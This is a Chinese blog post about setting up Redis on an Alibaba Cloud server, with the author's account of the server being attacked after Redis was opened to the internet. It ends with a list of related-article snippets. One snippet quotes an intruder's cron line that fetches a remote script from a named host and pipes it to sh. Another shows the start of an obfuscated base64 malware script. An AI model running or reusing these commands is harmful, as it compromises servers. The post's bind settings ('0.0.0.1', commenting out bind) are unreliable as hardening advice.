阿里远程linux服务器 redis搭建,安全配置与使用

最新推荐文章于 2025-09-06 22:56:13 发布
最新推荐文章于 2025-09-06 22:56:13 发布
阅读量124 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: 数据库 操作系统 区块链
原文链接:https://segmentfault.com/a/1190000012247204
本文分享了作者在阿里云服务器上部署Redis过程中遇到的安全问题及解决方案,包括如何正确配置Redis以防止外部恶意访问,以及如何利用内网IP提高安全性。

阿里远程linux服务器 redis安全配置与使用

前提: redis在不安全的使用上是存在漏洞的,个人也是在这个上面吃了很大的亏,真的这个问题也是弄了半天,所以打算好好的记录一下。

阿里远程服务器的redis安装

这里其实我就不过多的介绍了,网络上有很多的安装,大致都是一样的,总结下来总共就是几步

  1. 去官网下载redis的安装包
  2. 解压
  3. 进入解压目录下 make。编译
  4. 进入src 目录下 make install 安装

接下来我们就可以启动redis了,在src目录下 启动redis服务

./redis-server

启动redis服务之后,我们发现是前台启动的,修改起配置 让其后台启动

  1. 进入redis的解压目录下 vi编辑器打开 redis.conf 文件
  2. 将daemonize的值改为yes
  3. wq 保存
  4. 进入src 目录 通过配置文件启动
 ./redis-server  ../redis.conf

Ok 到这为止就安装好了,我们可以通过命令查看redis的服务是否启动

ps -ef | grep redis

总结: 其实到目前为止,我们的redis就可以使用了。但是问题往往开始出现了。

外部访问redis失败

其实整个问题的出现源起一个异常:

redis.clients.jedis.exceptions.JedisConnectionException: Could not get a resource from the pool

我也百度过会出现这个问题的原因:

  1. 连接池里面的线程不够用了,要对redis进行配置一下
  2. 外部根本就访问不到redis

其实大多数情况下,我们的各种配置都是拷贝好的,稍微改改参数而已,所以问题就出现在了外部无法访问redis,对于这个东西我们可以使用工具测试

  1. 使用redis远程连接客户端(Redis Desktop Manager )连接一下看看是否能连接上
  2. telnet 测试一下 (自行百度吧,因为我也没用过 我是直接用客户端连接测试的)

当你测试后发现,哎呀 确实连不上哈,直接就去百度,redis如何外部访问,百度会给你一堆结果,不过都是一样的:

  1. 修改redis安装目录下的redis.conf文件,把 # bind 127.0.0.1 这个前面的注视去掉,并改为0.0.0.1
  2. 重启redis服务器
  3. 好了 你再试试。邪魅的?

这个时候你再去连接的时候你发现,确实连接上了,并且程序中使用的redis也没问题了。

到此为止 :我们可能以为万事大吉了,可是没多久你就会发现你错了,而我的错误也从此开始。

redis 安全配置

redis 遇到的坑

上面的一系列操作都是我的真实操作,当然中间其实有一些我操作上的失误,一会下面我详细说一下。

  • redis的这个坑其实遇到的人还是蛮多的,废话少说,直接给大家上图:

图片描述

简单列举一下:

这几个解释了为什么会出现这样的问题,以及该如何解决。

其实这里的重点并不是如何结局,而是我们为什么就碰到了redis的这个坑呢?

为什么会进入redis 的坑?

其实这个是我们新手比较容易搞乱套的一些东西,还有一些我们需要搞清楚的知识点

  • 阿里云的外网与私网 IP

外网IP:给外部人访问,也称为公网,对于外网的流量,阿里云是收费的。

内网IP:就是局网IP,如果你有几台以上的云主机,可以局网传输数据,局网传输数据不占用外部带宽限制,传输大文件速度会快很多很多。

准确说内网IP地址的地址段是专门给私有网络用的,大多数用于内部网络的通信,或者外网IP缺少时,替代外网IP进行网络设备IP的分配。
外网IP其实就是合法的互联网地址,所有在互联网中的网络设备,服务器,计算机之间的通信都是通过外网IP进行通信的。
另外对于局域网这个概念,其实不仅仅局限于内网,比如同一个网段的公网IP的网络也属于局域网的范畴!

  • 我的理解

我的理解其实就是很简单

  1. 公网不安全
  2. 内网外部不能访问,安全

哈哈 当然了我说的是否准确,希望有大佬们帮忙指导。

  • 我所犯的错误

前提:我们接的别人的1期项目,拿到手之后修改放在自己的服务器上运行。

  1. 很直接的直接把程序中的配置文件中访问人家服务器的地址全部直接修改为我们服务器的地址(公网)
  2. 运行出问题。。。

找了半天,找到了问题,公网访问不通,直接百度,把服务器的防火墙关了,开放了端口,设置了redis的外部访问。。

最后问题就出现了。 服务器被攻击了。

避免redis再次出现问题 解决方案

这个时候其实我们应该已经意识到不要通过公网访问的问题了

  1. 把redis 的配置文件 也就是redis.conf 中的bing 0.0.0.1 注释掉,禁止外部去访问。
  2. 修改程序中的配置文件,将redis访问的地址改为内网ip。

再次打包上传,这样其实就没有问题了,当然还有一些安全的解决方案,可以看一下上面给出的解决问题的连接。

解决后续的配置问题

  • 其实一开始我知道要这样配置,但是如果把配置文件的请求地址都改为内网ip 的话,你的本地程序是起不来的,因为我们无法直接连接到内网。
  • 那么如果想要本地测试,并且保证起安全性的话,我们需要配置openvpn,参看配置文档: https://help.aliyun.com/knowl...

ok,到此为止我的问题解决了。

后记

最后我想说几点

  • 千万别拿配置本地服务器(自己的机器上)的操作操作云服务器

因为很多情况下,我们在设置本机的服务器的时候,查询百度的结果动不动就是开启哪个端口,关闭防火墙。如果是在云端的服务器的话,就很容易被这样的挖矿程序攻击。

  • 修改端口与防火墙的操作一定要慎重

目前我这个技术有限,希望大佬们看到了多多指教。

挖矿程序瓦的比特币到底是啥:https://www.zhihu.com/questio...

腾讯云Linux服务器运维,安装JDK、rabbitmq、nginx、Redis、ClickHouse
Java 技术专栏,从入门到精通,熟悉企业级开发
08-29 4万+
腾讯云服务器opencloudos 安装JDK、rabbitmq、nginx、Redis、ClickHouse。
mysql、redis、nginx等linux搭建
weixin_40444253的博客
08-11 1327
mysql、redis、nginx等linux搭建
redis 安全漏洞导致服务器被攻击
Golden_lion的博客
03-01 4033
近日发现redis数据无故被清,恢复后连续几次还是被清,由于经验不足,一直认为是自己配置有误。经过多天查找,才发现2015年11月份爆发了redis安全漏洞攻击事件,一一印证了下,全部中招。 特点: 1.redis缓存被清0;而且每天会执行一次; 2./root/.ssh/ 下多了几个文件。dump.rdb, foo.txt, authorized_keys里多了莫名
Redis服务器中有75%受到恶意软件感染
w3cschools的博客
06-05 723
  尽管由于配置错误的服务器和应用程序而导致新的网络攻击不断出现,但人们仍然忽略安全警告。  近两个月前,中国知名黑客组织东方联盟研究人员警告说,一项针对开放Redis服务器的大规模恶意软件活动现在已经发展壮大,且已经劫持了至少75%的服务器运行可公开访问的Redis实例。  Redis或REmoteDIctionaryServer是一种开源广泛流行的数据结构工具,可用作内存中分布式数据库,消息...
redis黑客入侵
程序员陆通
02-12 1541
[root@iZ112fail84Z home]# redis-cli 127.0.0.1:6379> keys * 1) “crackit” 127.0.0.1:6379> get crackit “\n\n\n*/5 * * * * /usr/bin/curl -fsSL http://sx.doiton.tk/test.sh | sh\n\n\n\n”这个程序每5分钟执行一个shell
记一次Redis漏洞导致服务器被入侵以及解决的过程
orisonchan的博客
08-09 2746
其实这个问题在网上都有说明。然而因为本人是开发出身,运维方面比较欠缺,所以才会遇到此问题,遂记录下来,以此为戒。 被入侵现象 服务器多了很多莫名其妙的操作,根据查看操作记录命令history得到。 服务器会莫名其妙重启。 经常ssh免密登录失效。 apt-get使用报错。 报错log如下: insserv: warning: script 'S01w...
Redis配置不当致使root被提权漏洞
牧竹子
11-17 6857
Redis配置不当致使root被提权漏洞Dear all~ 最近Redis服务被曝出因配置不当,可能造成数据库被恶意清空,或被黑客利用写入后门文件造成进一步入侵,关注!一、漏洞发布日期 2015年11月10日 二、已确认被成功利用的软件及系统 对公网开放,且未启用认证的redis服务器。 三、漏洞描述 最近Redis服务被曝出因配置不当,被攻击者进行恶意利用。 黑客借助redi
阿里redis集群搭建.docx
07-13
### 阿里Redis集群搭建详解 #### 一、背景目的 随着业务规模的不断扩大,单一Redis实例已经难以满足高性能、高可用性的需求。为此,越来越多的企业选择搭建Redis集群来提高系统的处理能力和容错能力。然而,在...
阿里服务器搭建SpringBoot-MySQL-Redis-Nginx项目搭建
qq_35760202的博客
03-05 1677
首先在阿里云上购买对应的服务器 本地搭建选择的 服务器:CentOS 6.8 64位 数据库: mysql 5.7 redisredis-3.2.9 nginx: 步骤: 第一章:购买服务器 1.1、购买服务器; 1.2、远程登录; 1.3、重置密码; 1.4、重启服务器 1.5、配置规则; 第二章:安...
部署阿里服务器—— Linux + NodeJS + Mysql + Nginx
weixin_56361614的博客
03-28 1398
nginx 服务器的页面文件在 nginx 安装目录的 html 目录中,如按以上步骤操作的话,在。nginx 服务器的页面文件在 nginx 安装目录的 html 目录中,如按以上步骤操作的话,在。nginx 服务器配置文件在 nginx 安装目录的 conf 目录中。nginx 服务器配置文件在 nginx 安装目录的 conf 目录中。运行 【1】命令后,按 i 进入 编辑模式,在拷贝 【2】的内容。目录,sbin目录只有一个nginx目录。的目录,这个才是我们的服务器目录。
服务器安装配置Redis
Lemon.da的博客
04-15 3553
CentOS7系统服务器安装配置redis使用redis图形化界面客户端redisPlus连接1.redis简单介绍1.1 什么是Redis1.2 NoSQL1.3 NoSQLRDBMS的区别2.redis的特点3.安装redis3.1 安装redis需要的环境3.2 官网下载redis源码安装包3.3 进入压缩包所在目录,解压3.4 解压完成后,进入安装目录执行编译命令make3.5 执行安装命令3.6 开启服务3.7 使用redis客户端连接redis服务器4.redis简单配置4.1 demon
阿里服务器 liunx 安装配置 redis
phpfzh的博客
06-02 3802
官网下载链接:https://redis.io/download下载4.0.9版本用xftp 把下载好的 redis-4.0.9.tar.gz 上传到liunx服务器上我的阿里服务器保存目录为:/usr/local/redis41  执行解压缩命令:tar xzf redis-4.0.9.tar.gz2  解压完成后进入目录:cd ./redis-4.0.93 编译:make4 指定目录编译bi...
Redis未授权访问漏洞
wanghaichaonihao的专栏
07-27 4332
一、漏洞描述和危害    Redis配置不当可以未授权访问,被攻击者恶意利用。 攻击者无需认证访问到内部数据,可能导致敏感信息泄露,黑客也可以恶意执行flushall来清空所有数据。 攻击者可通过EVAL执行lua代码,或通过数据备份功能往磁盘写入后门文件。 如果Redisroot身份运行,黑客可以给root账户写入SSH公钥文件,直接通过SSH登录受害服务器。  
记一次云服务器redis漏洞被黑
m0_46435741的博客
11-21 1997
您所使用的设备(IP:***)存在对其他服务器端口(TCP:6379)的攻击行为 大晚上的,在床上躺着,突然腾讯云给我发个消息和邮件,如下: 吓我一跳,定睛一看,端口6379,不是radis的默认端口吗?前些阵子写项目就用自己的服务器搭了一个radis服务器,不会被黑了吧?百般纳闷,反正说是24小时内,不管,先睡觉 早上爬起来,想用Xshell登录一下服务器看看,结果死活登不上,再在控制台看看,结果还是登不上,心想:完了,不会真被黑了吧?用腾讯云自动实例检测,提示CPU近期占有率高达92%,但是我在服务
Linux OpenSSH-9.0p1最新版升级步骤详细
建伟博客
03-14 3110
OpenSSH 是 SSH (Secure SHell) 协议的免费开源实现。SSH协议族可以用来进行远程控制, 或在计算机之间传送文件。而实现此功能的传统方式,如telnet(终端仿真协议)、 rcp ftp、 rlogin、rsh都是极为不安全的,且会使用明文传送密码。OpenSSH提供了服务端后台程序和客户端工具,用来加密远程控制和文件传输过程中的数据,由此来代替原来的类似服务。...
centos病毒
weixin_30319153的博客
04-10 4626
#!/bin/bash exec &>/dev/null {echo,ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4Kc2xlZXAgJCg oUkFORE9NICUg...
基于SpringBoot和uni-app开发的陪诊陪护软件系统源码
程序员创业中
09-06 718
中国60岁以上人口已突破3.1亿,独居老人超1.3亿,而一线城市三甲医院日均门诊量超万人次。在这组数据背后,是无数家庭面临的困境:子女异地工作无法陪同父母就医,独居老人因不会操作智能设备在挂号机前徘徊,异地患者因不熟悉流程在医院迷路……当“就医”从个人事务演变为社会难题,陪诊陪护系统正以“专业服务+技术赋能”的双重模式,成为破解这一困局的关键。
Date、BigDecimal类型值转换
最新发布
2301_81922209的博客
09-06 151
本文展示了前后端数据交互中日期和数值类型的转换处理。前端输入JSON数据包含日期字符串(yyyy-MM-dd和yyyy/MM/dd格式)和数值,后端通过@JsonFormat注解自动转换为Date类型,BigDecimal类型则用于精确计算。数据库中存储datetime和decimal类型数据。后端处理时,使用工具类对价格和利率进行格式化:价格保留两位小数(四舍五入),利率转换为百分比格式。最终响应数据将日期转为时间戳或格式化字符串,数值转为格式化字符串,转换支付方式编码为描述文本。完整流程涵盖数据接收、
【开题答辩全过程】以 基于SSM的电竞设备商城设计开发为例,包含答辩的问题和答案
shiji7553的博客
09-03 629
这是一篇关于计算机专业毕业设计答辩的摘要。文中介绍了一位14年经验的资深毕设内行人,擅长Java、PHP、微信小程序、Python、Golang、安卓Android等多种开发语言,项目涉及大数据、深度学习、网站、小程序、安卓系统、算法等。该内行人还提供项目定制开发、代码讲解、答辩教学、文档编写、降重技巧等服务。 在答辩过程中,学生详细介绍了其基于SSM框架开发的电竞设备商城系统,包括用户角色划分、功能模块设计、技术选型依据(Java/SSM/HTML/CSS/MySQL/B-S架构)以及安全措施(MD5加盐
搭建Redis 4.0.x集群实践问题全解
- **Linux服务器端验证**:搭建完毕后,需在服务器上进行测试,确保Redis集群配置正确且节点间通信正常。 - **本地验证**:通过编写Jedis代码连接阿里服务器,检查集群是否可以被正确访问,这对于远程部署和监控...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值